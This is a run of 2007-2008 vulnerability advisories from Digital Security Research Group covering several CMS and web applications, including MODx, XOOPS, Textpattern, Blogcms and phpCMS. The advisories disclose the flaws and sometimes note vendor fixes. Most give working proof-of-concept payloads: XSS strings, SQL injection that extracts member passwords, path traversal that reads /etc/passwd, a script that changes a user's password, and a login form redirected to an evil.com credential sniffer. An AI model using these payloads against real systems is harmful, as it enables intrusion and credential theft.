Digital Security Research Group [DSecRG] Advisory #DSECRG-08-013 Application:MODx CMS Versions Affected: 0.9.6.1, 0.9.6.1p1 Vendor URL: http://modxcms.com/ Bugs: XSS, SiXSS, stored XSS, Change User Password XSRF Vulnerability. Exploits: YES Reported: 11.01.2008 Vendor response:11.01.2008 Updated Report: 29.01.2008 Vendor response:none Solution: none Date of Public Advisory:07.02.2008 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** MODx system has multiple security vulnerabilities: 1. Linked XSS 2. Linked SiXSS 3. XSS in POST 4. Stored XSS in POST 5. Change User Password XSRF Vulnerability Details *** 1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL string. 1.1 Linked XSS vulnerability found in manager/index.php. GET parameter search Search string is available in pages: http://[server]/[installdir]/manager/index.php?a=75 http://[server]/[installdir]/manager/index.php?a=84 http://[server]/[installdir]/manager/index.php?a=99 http://[server]/[installdir]/manager/index.php?a=106 http://[server]/[installdir]/manager/index.php?a=114 Example: http://[server]/[installdir]/manager/index.php?a=75search=;IMG SRC=javascript:alert('DSecRG XSS') http://[server]/[installdir]/manager/index.php?a=84search=;IMG SRC=javascript:alert('DSecRG XSS') 1.2 Linked XSS vulnerability found in index.php. GET parameter highlight Example: http://[server]/[installdir]/index.php?searched=modxhighlight=;IMG SRC=javascript:alert('DSecRG XSS') -- 2. Multiple linked SiXSS vulnerabilities found. Attacker can inject XSS code in SQL Error. 2.1 Vulnerability found in script manager/index.php. GET parameter a Example: http://[server]/[installdir]/manager/index.php?a='img src=javascript:alert('DSecRG XSS') 2.2 Vulnerability found in script index.php. GET parameter id Example: http://[server]/[installdir]/index.php?id='img src=javascript:alert('DSecRG XSS') --- 3. XSS in POST, attacker can inject XSS in POST parameter 3.1 Vulnerability found in script index-ajax.php. POST parameters docgrp and moreResultsPage. Example: moreResultsPage = IMG SRC=javascript:alert('DSecRG XSS') 3.2 Vulnerability found in script index.php. POST parameters email, name and parent. Example: name = style=background:url(javascript:alert('DSecRG XSS')) --- 4. Vulnerability found in script manager/index.php?a=10 POST parameters messagesubject and messagebody. Attacker can comprose message with script code in subject and message body. --- 5. Change User Password XSRF Vulnerability Previous password not required to set a new password. Using XSS vulnerabilities, attacker can include following code to change user password: ___ IMG%20SRC=`javascript:var%20objHTTP%20=%20new%20ActiveXObject('MSXML2.XMLHTTP');%20objHTTP.open('POST',http://[server]/[installdir]/manager/index.php?a=34,false);%20objHTTP.setRequestHeader('Content-Type',%20'application/x-www-form-urlencoded');%20objHTTP.send(pass1=123456%26pass2=123456);` ___ About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
[DSECRG-08-012] Multiple LFI in Azucar CMS 1.3
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-012 Application:Azucar CMS Versions Affected: 1.3 Vendor URL: http://azucarcms.sourceforge.net/en_home.htm Bug:Multiple Local File Include Exploits: YES Reported: 30.01.2008 Vendor Response:NONE Date of Public Advisory:05.02.2008 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Azucar CMS has Multiple Local File Include vulnerabilities. 1. Local File Include vulnerabilities found in scripts index.php and index_sitios.php Code # if (isset($_GET[_VIEW]) ereg(^src|^vistas, $_GET[_VIEW])) include($_GET[_VIEW]); else header(Location: html/sitio/); # Example: http://[server]/[installdir]/index.php??view=src/sistema/vistas/../../../../../../../../../../../../../etc/passwd 2. Local File Include vulnerability found in script src/sistema/vistas/template/tpl_inicio.php Code # $vista = (isset($_GET[_VIEW])) ? $_GET[_VIEW] : PATH_PROYECTO . 'vistas/index.php'; include($vista); # Example: http://[server]/[installdir]/src/sistema/vistas/template/tpl_inicio.php?_VIEW=../../../../../../../../../../../../../etc/passwd 3. Local File Include vulnerability found in script html/sitio/index.php Code # if (isset($_GET[_VIEW])) { if (!file_exists($_GET[_VIEW])) { $vista_array = explode('/', $_GET[_VIEW]); $vista = $vista_array[0] . '/es_ES/' . $vista_array[2]; } else $vista = $_GET[_VIEW]; } $vista = (isset($_GET[_VIEW]) ereg(^src|^vistas, $_GET[_VIEW])) ? $vista : PATH_PROYECTO . 'vistas/es_ES/index.php'; include($vista); # Example: http://[server]/[installdir]/html/sitio/index.php?view=vistas/../../../../../../../../../../../../../etc/passwd About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
[DSECRG-08-010] VHD Web Pack 2.0 Local File Include
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-010 Application:VHD Web Pack 2.0 Versions Affected: VHD Web Pack 2.0 Vendor URL: http://www.divideconcept.net/index.php?page=vhdwebpack/index.php Bugs: Local File Include Exploits: YES Reported: 28.01.2008 Vendor response:NONE Date of Public Advisory:04.02.2008 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** VHD Web Pack 2.0 system has Local file Include security vulnerability Details *** Local File Include Attacker can inject PHP code and execute OS commands with webserver user privileges vulnerable script /vhdwebpack/index.php vulnerable parameter page Example: http://[server]/vhdwebpack/index.php?page=/../../../../../../../../boot.ini About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -- Digital Security Research Group mailto:[EMAIL PROTECTED]
[DSECRG-08-009] xoops 2.0.18 Local File Include
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-009 Application:XOOPS Versions Affected: XOOPS 2.0.18 Vendor URL: http://www.xoops.org/ Bugs: Local File Include,URL Redirecting phishing Exploits: YES Reported: 28.01.2008 Vendor response:28.01.2008 Date of Public Advisory:04.02.2008 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** XOOPS system has multiple security vulnerabilities: 1. Local File Include 2. Url redirection Phishing Details *** 1. Local File Include Attacker can inject PHP code and execute OS commands with webserver user privileges vulnerable script htdocs/install/index.php vulnerable POST parameter lang vulnerable code: $language = 'english'; if ( !empty($_POST['lang']) ) { $language = $_POST['lang']; . . . . if ( file_exists(./language/.$language./install.php) ) { include_once ./language/.$language./install.php; Example: POST /xoops-2.0.18/htdocs/install/index.php HTTP/1.0 Cookie: install_lang=english; lang=russian; PHPSESSID=p113cjpff5dkrkoka01al18kk5; dk_sid=sfa6hlhn75pobg6kqe5m8p30j1 Content-Length: 67 Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: localhost Content-Type: application/x-www-form-urlencoded Referer: http://localhost/xoops-2.0.18/htdocs/install/index.php lang=/../../../../../../../../boot.ini%00.htmlop=startsubmit=Next - 2. URL Redirection phishing Vulnerability found in script htdocs/user.php?xoops_redirect in post parameter name xoops_redirect Example: http://[server]/[installdir]/htdocs/user.php?xoops_redirect=http://evilsite.com Fix Information *** Vendor fix this flaw in svn on 28.10.2007. http://xoops.svn.sourceforge.net/viewvc/xoops?view=revrevision=1282 Tracker: http://sourceforge.net/tracker/index.php?func=detailatid=430840aid=1881236group_id=41586 About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -- Digital Security Research Group mailto:[EMAIL PROTECTED]
[DSECRG-08-011] Astrosoft HelpDesk Multiple XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-011 Application:Astrosoft HelpDesk Versions Affected: Vendor URL: http://astrosoft.ru/ Bugs: Multiple XSS Injections Exploits: YES Reported: 29.01.2008 Vendor response:NONE Date of Public Advisory:04.02.2008 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Astrosoft HelpDesk system has multiple security vulnerabilities: 1. Linked XSS 2. Linked SiXSS Details *** 1. Linked XSS vulnerability found in operator/article/article_search_results.asp, attacker can inject XSS in GET parameter txtSearch Example: http://[server]/[installdir]/operator/article/article_search_results.asp?txtSearch=;/formIMG SRC=javascript:alert('DSecRG XSS') 2. SiXSS in URL Vulnerability found in script operator/article/article_attachment.asp, attacker can inject XSS code in SQL Error. GET parameter Attach_Id Example: http://[server]/[installdir]/operator/article/article_attachment.asp?Attach_Id=;scriptalert('DSecRG XSS')/script About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -- Digital Security Research Group mailto:[EMAIL PROTECTED]
[DSECRG-08-008] Textpattern 4.0.5 Multiple Security Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-008 Application:Txp CMS Versions Affected: 4.0.5 Vendor URL: http://www.textpattern.com Bugs: DOS, multiple XSS, etc. Exploits: YES Reported: 11.01.2008 Vendor response:14.01.2008 Patch Released: 03.02.2008 Date of Public Advisory:04.02.2008 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Textpattern system has multiple security vulnerabilities: 1. Parameter Value Overflow 2. Linked XSS 3. XSS in POST 4. Stored XSS 5. Insecure password changing algorithm Details *** 1. Parameter Value Overflow Vulnerability found in script index.php in comments section. Post parameter message. The application does not ensure that the parameter value length. It can be used for performing a DOS attack. Example: message = [A]x1 2. Linked XSS vulnerability found in /textpattern/setup/index.php, attacker can inject XSS in URL string. Example: http://[server]/[installdir]/textpattern/setup/index.php/;scriptalert('DSecRG XSS')/script 3. XSS in POST Vulnerability found in script index.php in comments section. Post parameter name. Example: name = img src=javascript:alert('DSecRG XSS') name = scriptalert('DSecRG XSS')/script 4. Stored XSS Vulnerability found in script textpattern/index.php?event=article in post parameter Body. Example: Body = IMG SRC=javascript:alert(quot;DSecRG_XSSquot;) 5. Insecure password changing algorithm Previous password not required to set a new password. If attacker gain access to admin session by using XSS vulnerability, he can change admin password without knowing old password. It will be more secure to ask old password when changing password or primary email. Fix Information *** Textpattern was altered to fix this flaw on 03.02.2008. Updated version (4.0.6) can be downloaded here: http://textpattern.com/download About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -- Digital Security Research Group mailto:[EMAIL PROTECTED]
[DSECRG-08-007] OpenBSD BGPD daemon Web Interface XSS.
[#DSECRG-08-007] Digital Security Research Group [DSecRG] Advisory Application:OpenBSD BGPD daemon Versions Affected: OpenBSD 4.1 Vendor URL: http://openbsd.org Bugs: XSS Exploits: YES Reported: 10.10.2007 Vendor response:10.10.2007 Date of Public Advisory:31.01.2008 Authors:Alexandr Polyakov, Anton Karpov Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** OpenBSD BGPD daemon Web Interface has XSS vulnerability History http://www.mail-archive.com/[EMAIL PROTECTED]/msg49057.html Details *** Linked XSS vulnerability found in script /cgi-bin/bgplg attacker can inject XSS in parameter cmd Example: http://[server]/cgi-bin/bgplg?cmd=shov+versionscriptalert('DSecRG XSS')/script Fix Information *** Vendor was altered to fix this flaw in svn on 10.10.2007. Updated version OpenBSD 4.2 which was released Nov 1, 2007. can be downloaded here: http://openbsd.org About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -- Digital Security Research Group mailto:[EMAIL PROTECTED]
Re: [DSECRG-08-007] OpenBSD BGPD daemon Web Interface XSS.
version 4.2 is NOT affected, please alter it in advisory http://secunia.com/advisories/28726/ and others. Vendor fix this flaw in cvs on 10.10.2007. http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/bgplg/bgplg.c Updated version OpenBSD 4.2 which was released Nov 1, 2007 is NOT vulnerable. [#DSECRG-08-007] Digital Security Research Group [DSecRG] Advisory Application:OpenBSD BGPD daemon Versions Affected: OpenBSD 4.1 Vendor URL: http://openbsd.org Bugs: XSS Exploits: YES Reported: 10.10.2007 Vendor response:10.10.2007 Date of Public Advisory:31.01.2008 Authors:Alexandr Polyakov, Anton Karpov Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** OpenBSD BGPD daemon Web Interface has XSS vulnerability History http://www.mail-archive.com/[EMAIL PROTECTED]/msg49057.html Details *** Linked XSS vulnerability found in script /cgi-bin/bgplg attacker can inject XSS in parameter cmd Example: http://[server]/cgi-bin/bgplg?cmd=shov+versionscriptalert('DSecRG XSS')/script Fix Information *** Vendor fix this flaw in cvs on 10.10.2007. Updated version OpenBSD 4.2 which was released Nov 1, 2007. can be downloaded here: http://openbsd.org About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -- С уважением, Digital Security Research Group mailto:[EMAIL PROTECTED]
Remote File Disclosure in phpCMS 1.2.2
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-005 Application:phpCMS Versions Affected: 1.2.2 Vendor URL: http://www.phpcms.de Bug:Remote File Disclosure, Get admin password Exploits: YES Reported: 10.01.2008 Vendor response:12.01.2008 Date of Public Advisory:29.01.2008 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** phpCMS system has remote File Disclosure vulnerability in page /parser/include/class.cache_phpcms.php Details *** Attacer can read any files in web directory. In file parser/parser.php include class.cache_phpcms.php --- // Load the i18n Handler if (isset ($_GET ['file']) isset($DEFAULTS-I18N) 'on' == $DEFAULTS-I18N) { include(PHPCMS_INCLUDEPATH.'/class.lib_i18n_phpcms.php'); $I18N = new i18n; } $PHPCMS-check_secure_stealth(); include(PHPCMS_INCLUDEPATH.'/class.cache_phpcms.php'); exit; --- In file class.cache_phpcms.php function GetFile() parse URL and return full file name or default value. Function checks file extension but does't check for null byte injection. To read file attacker must append a valid extension with null byte to file like a %00.gif or smth. --- // filequery exists, but filename is empty? - set the defaultvalue for filename if(!stristr($temp, $DEFAULTS-PAGE_EXTENSION) AND !stristr($temp, '.gif') AND !stristr($temp, '.png') AND !stristr($temp, '.jpg') AND !stristr($temp, '.js') AND !stristr($temp, '.css') AND !stristr($temp, '.htm') AND !stristr($temp, '.html')) { if(substr($temp, -1) != '/') { $temp = trim($temp).'/'.$DEFAULTS-PAGE_DEFAULTNAME; $temp.= $DEFAULTS-PAGE_EXTENSION; } else { $temp = trim($temp).$DEFAULTS-PAGE_DEFAULTNAME; $temp.= $DEFAULTS-PAGE_EXTENSION; } } --- In file class.cache_phpcms.php function CheckFile() take file name and if file exist read it and print file contents. --- $PfadUndDatei = $this-GetFile(); $this-name = basename($PfadUndDatei); $this-path = dirname($PfadUndDatei); ... // there's no contentfile with this name - errorpage or errormessage if(!file_exists($DEFAULTS-DOCUMENT_ROOT.$this-path.'/'.$this-name)) { $errorname = basename($DEFAULTS-ERROR_PAGE_404); $errorpath = dirname($DEFAULTS-ERROR_PAGE_404); ... ... $fsize = filesize($DEFAULTS-DOCUMENT_ROOT.$this-path.'/'.$this-name); $fd = fopen($DEFAULTS-DOCUMENT_ROOT.$this-path.'/'.$this-name, rb); $contents = fread($fd, $fsize); $contents = trim($contents); $fsize = strlen($contents); fclose($fd); ... echo $contents; --- Example: http://[server]/[installdir]/parser/parser.php?file=/parser/include/default.php%00.gif default.php includes admin password and other defaults: --- class defaults { function defaults() { global $PHP, $PHPCMS; if(!defined(_DEFAULTS_)) { define(_DEFAULTS_, TRUE); } $this-PASS = 'YourPasswordHere'; ... --- In windows we can read any local file: http://[server]/[installdir]/parser/parser.php?file=\..\..\..\..\..\..\..\..\..\..\boot.ini%00.gif http://www.phpcms.de/download/index.en.html About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -- Digital Security Research Group mailto:[EMAIL PROTECTED]
Nucleus 3.31 XSS in path
Hello. Digital Security Research Group [DSecRG] Advisory #DSECRG-08-006 Application:Nucleus CMS Versions Affected: 3.31 Vendor URL: http://nucleuscms.org Bugs: XSS Injestion in URL Exploits: YES Reported: 16.01.2008 Vendor response:18.01.2008 Date of Public Advisory:29.01.2008 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Linked XSS vulnerability found in action.php, attacker can inject XSS in URL string: Example: http://[server]/[installdir]/action.php/;scriptalert('DSecRG XSS')/script Fix Information *** TikiWiki was altered to fix this flaw on 29 january 2008. Updated version (3.32) can be downloaded here: http://prdownloads.sourceforge.net/nucleuscms/nucleus3.32.zip?download About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -- mailto:[EMAIL PROTECTED]
[!!FIX Information ] Nucleus 3.31 XSS in path
It is updated version of advisory. updated info in Fix Information part, mistake in vendor name. Digital Security Research Group [DSecRG] Advisory #DSECRG-08-006 Application:Nucleus CMS Versions Affected: 3.31 Vendor URL: http://nucleuscms.org Bugs: XSS Injection in URL Exploits: YES Reported: 16.01.2008 Vendor response:18.01.2008 Date of Public Advisory:29.01.2008 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Linked XSS vulnerability found in action.php, attacker can inject XSS in URL string: Example: http://[server]/[installdir]/action.php/;scriptalert('DSecRG XSS')/script Fix Information *** Nucleus was altered to fix this flaw on 29 January 2008. Updated version (3.32) can be downloaded here: http://prdownloads.sourceforge.net/nucleuscms/nucleus3.32.zip?download About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -- mailto:[EMAIL PROTECTED]
[DSECRG-08-003] blogcms 4.2.1b Multiple Security Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-003 Application:Blogcms Versions Affected: Blogcms 4.2.1b Vendor URL: http://blogcms.com/ Bugs: SQL Injestions, SiXSS, XSS Exploits: YES Reported: 15.01.2008 Vendor response:16.01.2008 Date of Public Advisory:16.01.2008 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Reasearch Group [DSecRG] (research [at] dsec [dot] ru) Description *** Blogcms system has multiple security vulnerabilities: 1. Multiple SQL Injections 2. Multiple Linked XSS 3. Multiple Linked SiXSS Details *** 1. Multiple SQL Injection vulnerabilities 1.1 Attacker can inject SQL code in index.php. Parameter name blogid Example: http://[server]/[installdir]/index.php?query=asdblogid=1,1)+union+select+1,2,user(),database(),mname,6,7,8,9,10,11,mpassword,13,14,15+from+nucleus_member/* 1.2 Attacker can inject SQL code in module /blogcms/action.php. POST parameter name user Example: POST /blogcms/action.php HTTP/1.0 Cookie: DokuWiki=g8m41hncjkfjkc4sb1lvmgbiu5 Content-Length: 139 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; DS; .NET CLR 2.0.50727) Host: 192.168.40.33 Pragma: no-cache Connection: Keep-Alive action=addcommenturl=http%3A%2F%2F192.168.40.33%2Fblogcms%2F%3Fitem%3Dblog-cms-4-2-1itemid=1body=asduserid=asdx=42y=13user=asd'+[DSecRG_INJECTION] --- 2. Multiple Linked XSS vulnerabilities Linked XSS vulnerability found in /photo/admin.php and /photo/index.php attacker can inject XSS script in URL Example: http://[server]/[installdir]/photo/admin.php/;scriptalert('DSECRG_XSS')/script http://[server]/[installdir]/photo/index.php/;scriptalert('DSECRG_XSS')/script --- 3. Multiple SiXSS (XSS throught SQl Injection Error) vulnerabilities 3.1 Linked SiXSS vulnerability found in index.php, attacker can inject XSS code in SQL Error Example: http://[server]/[installdir]/index.php?query=asdamount=0blogid=1'scriptalert('DSecRG_XSS')/script;x=34y=6 3.1 Linked SiXSS vulnerability found in /admin/plugins/table/index.php, attacker can inject XSS code in SQL Error It is also a SQL injection but because it is in admin panel it is not critical. Example: http://[server]/[installdir]/admin/plugins/table/index.php?action=edittemplatefield=title'scripta=/DSecRG XSS/%0d%0aalert(a.source)/scriptid=2text=0 --- Fix Information *** Blogcms was altered to fix this flaw on 16.01.2008. Updated version (4.2.1.c) can be downloaded here: http://blogcms.com/?item=download Changelog: http://blogcms.com/wiki/changelog About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
[DSECRG-08-002] Local File Include in arias 0.99-6
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-002 Application:aria-0.99-6 (Web based ERP) Versions Affected: aria-0.99-6 Vendor URL: http://www.tucows.net/ Bug:Local File Include Exploits: YES Reported: 09.01.2008 Vendor Response:None Date of Public Advisory:15.01.2008 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Aria has Local File Include vulnerability in page arias/help/effect.php Code if (empty($_GET['page'])) { $page = 'help.php'; } else { $page = $_GET['page']; } if (false == is_file($page)) { $page = 'file_not_found.php'; } include($page); } Example: http://[server]/[installdir]/arias/help/effect.php?page=[file] About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
LFI in Tuned Studios Templates
Digital Security Research Group [DSecRG] Advisory #DSECRG08-001 Application:Tuned Studios Templates Versions Affected: All Vendor URL: http:/www.tunedstudios.com Bug:Local File Include Exploit:YES Reported: 09.01.2008 Date of Public Advisory:09.01.2008 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Reasearch Group [DSecRG] (research [at] dsec [dot] ru) Description *** Tuned Studios Templates has Local File Include vulnerability in page phpversion/index.php Details *** Tuned Studios has many templates based on same vulnerable php code Code //First check if $page exists //With the introduction of PHP 5 we have to capture the $page from the url. $page = $_GET['page']; if(isset($page) $page != '') { //Check if the page $page exists if(file_exists($page.'.php')) { //Now we can include the page. include($page.'.php'); } else { //Page can't be found, include the error file include('data/error404.data.php'); } } Example: http://[server]/[installdir]/index.php?page=../../../../../../../[file]%00 About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
2z-project 0.9.6.1 Multiple Security Vulnerabilities
Digital Security Research Group [DSecRG] Advisory Name:2z project Systems Affected:2z project 0.9.6.1 Vendor URL: http://2z-project.ru Authors: Alexandr Polyakov, Stas Svistunovich Digital Security Reasearch Group [DSecRG] (research [at] dsec [dot] ru) Reported:27.12.2007 Vendor response: 27.12.2007 Date of Public Advisory: 28.12.2007 Description *** 2z system has multiple security vulnerabilities: 1. Stored XSS 2. Linked XSS 3. Image XSS 4. Path disclosure 5. Vulnerable Password changing algorithm Details *** 1. Multiple Stored XSS 1.1 Vulnerability in script http://[server]/[installdir]/?action=addnews in post parameters: parameter name = contentshort parameter name = contentfull Example: contentshort=scriptalert('DSecRG XSS')/script contentfull=scriptalert('DSecRG XSS')/script 1.2 Vulnerability in script http://[server]/[installdir]/2z/admin.php?mod=pmaction=write parameter name = content Example: content=scriptalert('DSecRG XSS')/script --- 2. Linked XSS Vulnerability in page index.php. Working only if user not logged in. So it can be used for Phishing (see Example). Template /templates/default/usermenu.tpl have vulnetability parameter referer. This template included to index.php, so it can be used for Phishing. Source code of usermenu.tpl: --- form name=login method=post action= id=login input type=hidden name=referer value={request_uri} / -- html code injected into {request_uri} input type=hidden name=action value=dologin / .. input onfocus=if (!set_login){set_login=1;this.value='';} value={l_name} class=mw_login_form type=text name=username maxlength=60 size=25 / .. input onfocus=if(!set_pass){set_pass=1;this.value='';} value={l_password} class=mw_login_form type=password name=password maxlength=20 size=25 / .. /from --- Example: http://[server]/[installdir]/?/form/name=login/method=post/action=http://evil.com/sniffer.php/id=login;input/type=hidden/name=referer/value= http://[server]/[installdir]/index.php?/form/name=login/method=post/action=http://evil.com/sniffer.php/id=login;input/type=hidden/name=referer/value= - 3. Image XSS Vulnetability in page /2z/?action=profile Attacker can upload avatar and photo contained a XSS code. Vulnerable parameters: newavatar, newphoto For more information see http://www.dsec.ru/about/articles/web_xss/ (in russian) - 4. Path disclosure By exploiting this issue, an attacker may gain sensitive information on the directory structure of the server machine, which allows for further attacks against the site. Example: http://[server]/[installdir]/index.php?template=test http://[server]/[installdir]/?year=1234month=06 - 5. Password changing vulnerabiluity Old password not needed to change password. - About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)